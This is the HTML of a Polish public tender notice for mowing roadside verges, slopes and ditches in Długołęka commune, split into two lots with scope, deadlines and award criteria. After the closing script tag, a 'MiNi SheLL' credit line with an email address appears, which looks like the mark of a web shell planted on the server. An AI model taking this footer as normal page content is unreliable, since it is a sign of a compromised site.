<br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Istotne postanowienia umowy zawiera projekt umowy stanowiący załącznik nr 8 do SIWZ (odpowiednio do danej części (pakietu)).2.	Zamawiający dopuszcza możliwość dokonania zmian treści umowy zgodnie z postanowieniami zawartymi w projekcie umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-03-13</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Koszenie poboczy i innych elementów (skarpa, przeciwskarpa, rowy) pasa drogowego dróg utwardzonych i gruntowych zlokalizowanych na terenie gminy Długołęka - PAKIET NR 1</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia są usługi koszenia poboczy i innych elementów pasa drogowego(w tym: skarpa, przeciwskarpa, rowy) dróg utwardzonych i gruntowych zlokalizowanychna terenie gminy Długołęka w następujących miejscowościach: Mirków, Byków, Szczodre, Domaszczyn, Pruszowice, Ramiszów, Pasikurowice, Siedlec, Godzieszowa, Tokary, Bukowina, Bąków, Łozina, Bierzyce, Zaprężyn, Krakowiany, Budziwojowice, Łosice, Dąbrowica, Michałowice, Kępa, Dobroszów Oleśnicki, Januszkowice, Jaksonowice, Skała, Stępin, Węgrów.Szczegółowy zakres przedmiotu zamówienia obejmuje:1)	koszenia mechaniczne poboczy pasa drogowego i innych jego elementów (skarpa, przeciwskarpa, rowy) dróg gminnych (około 19 000 ar), tj.: a)	koszenie traw i chwastów na szerokości 1,5 – 2,0 m od krawędzi jezdni pasa drogowego oraz skarp, przeciwskarp i rowów – do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	zgrabienie, załadunek i wywóz ściętej trawy zalegającej po skoszeniu na trawnikach, jezdni, chodnikach, parkingach i innych miejscach utwardzonych (zgodnie z obowiązującymi przepisami) niezwłocznie po skoszeniu jednak nie później niż w ciągu 12 godzinod skoszenia,e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowyi inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne.2)	koszenia mechaniczne poboczy pasa drogowego i innych jego elementów (skarpa, przeciwskarpa, rowy) dróg powiatowych (około 15 680 ar), tj.: a)	koszenie traw i chwastów na całej powierzchni pasa drogowego (pobocze, skarpy, rowy drogowe i pas terenu za rowem) – do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	ściętą trawę z pasa drogowego dróg powiatowych należy mulczować i usunąć (zdmuchać)z jezdni na pas zieleni. W przypadku zagrożenia zatkania się systemów odprowadzających wody, należy skoszoną trawę wywieźć lub odpowiednio zutylizować. Skoszona trawaw każdym przypadku powinna być usunięta z jezdni, z pobocza, chodników,e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowyi inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne.3)	koszenia mechaniczne na szerokości 1,5 – 2,0 m poboczy (ze skarpą) w pasie drogowym dróg powiatowych (około 22 400 ar), tj.:a)	koszenie traw i chwastów na szerokości 1,5 – 2,0 m od krawędzi jezdni pasa drogowego (skarpa) - do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	ściętą trawę z pasa drogowego dróg powiatowych należy mulczować i usunąć (zdmuchać)z jezdni na pas zieleni. W przypadku zagrożenia zatkania się systemów odprowadzających wody, należy skoszoną trawę wywieźć lub odpowiednio zutylizować. Skoszona trawaw każdym przypadku powinna być usunięta z jezdni, z pobocza, chodników. e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowyi inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>77314100-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin płatności faktury VAT</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Koszenie poboczy i innych elementów (skarpa, przeciwskarpa, rowy) pasa drogowego dróg utwardzonych i gruntowych zlokalizowanych na terenie gminy Długołęka - PAKIET NR 2</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia są usługi koszenia poboczy i innych elementów pasa drogowego(w tym: skarpa, przeciwskarpa, rowy) dróg utwardzonych i gruntowych zlokalizowanychna terenie gminy Długołęka w następujących miejscowościach: Mirków, Byków, Szczodre, Domaszczyn, Pruszowice, Ramiszów, Pasikurowice, Siedlec, Godzieszowa, Tokary, Bukowina, Bąków, Łozina, Bierzyce, Zaprężyn, Krakowiany, Budziwojowice, Łosice, Dąbrowica, Michałowice, Kępa, Dobroszów Oleśnicki, Januszkowice, Jaksonowice, Skała, Stępin, Węgrów.Szczegółowy zakres przedmiotu zamówienia obejmuje:1)	koszenia mechaniczne poboczy pasa drogowego i innych jego elementów (skarpa, przeciwskarpa, rowy) dróg gminnych (około 16 500 ar), tj.: a)	koszenie traw i chwastów na szerokości 1,5 – 2,0 m od krawędzi jezdni pasa drogowego oraz skarp, przeciwskarp i rowów – do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cmd)	zgrabienie, załadunek i wywóz ściętej trawy zalegającej po skoszeniu na trawnikach, jezdni, chodnikach, parkingach i innych miejscach utwardzonych (zgodnie z obowiązującymi przepisami) niezwłocznie po skoszeniu jednak nie później niż w ciągu 12 godzinod skoszenia,e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowyi inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne. 2)	koszenia mechaniczne poboczy pasa drogowego i innych jego elementów (skarpa, przeciwskarpa, rowy) dróg powiatowych (około 9 668 ar), tj.: a)	koszenie traw i chwastów na całej powierzchni pasa drogowego (pobocze, skarpy, rowy drogowe i pas terenu za rowem) – do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	ściętą trawę z pasa drogowego dróg powiatowych należy mulczować i usunąć (zdmuchać) z jezdni na pas zieleni. W przypadku zagrożenia zatkania się systemów odprowadzających wody, należy skoszoną trawę wywieźć lub odpowiednio zutylizować. Skoszona trawa w każdym przypadku powinna być usunięta z jezdni, z pobocza, chodników. e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowy i inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne. 3)	koszenia mechaniczne na szerokości 1,5 – 2,0 m poboczy (ze skarpą) w pasie drogowym dróg powiatowych (około 13 808 ar), tj.: a)	koszenie traw i chwastów na szerokości 1,5 – 2,0 m od krawędzi jezdni pasa drogowego (skarpa) - do 4 razy w okresie obowiązywania umowy,b)	uporządkowanie i przygotowanie terenu pod koszenie (wybranie z trawy kamieni, gruzu, śmieci, papierów, folii, wszelkiego rodzaju opakowań, itp., w tym zużytych opon samochodowych wraz z rozgarnięciem kretowisk) oraz wywóz i utylizacja odpadów powstałych w związku z wykonywanymi pracami - niezwłocznie po zakończeniu prac porządkowych jednak nie później niż w ciągu 6 godzin od ich zakończenia,c)	wysokość trawy bezpośrednio po skoszeniu nie może przekraczać 5 cm,d)	ściętą trawę z pasa drogowego dróg powiatowych należy mulczować i usunąć (zdmuchać) z jezdni na pas zieleni. W przypadku zagrożenia zatkania się systemów odprowadzających wody, należy skoszoną trawę wywieźć lub odpowiednio zutylizować. Skoszona trawa w każdym przypadku powinna być usunięta z jezdni, z pobocza, chodników. e)	zamawiający dopuszcza koszenie za pomocą kosy spalinowej w miejscach, w których koszenie mechaniczne jest niemożliwe, tj. w miejscach gdzie występują bariery ochronne, oznakowanie pionowe, słupy oświetleniowe, drzewa, wysokie skarpy, przeciwskarpy, rowy i inne elementy drogi, gdzie niemożliwe jest koszenie mechaniczne.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>77314100-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin płatności faktury VAT</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com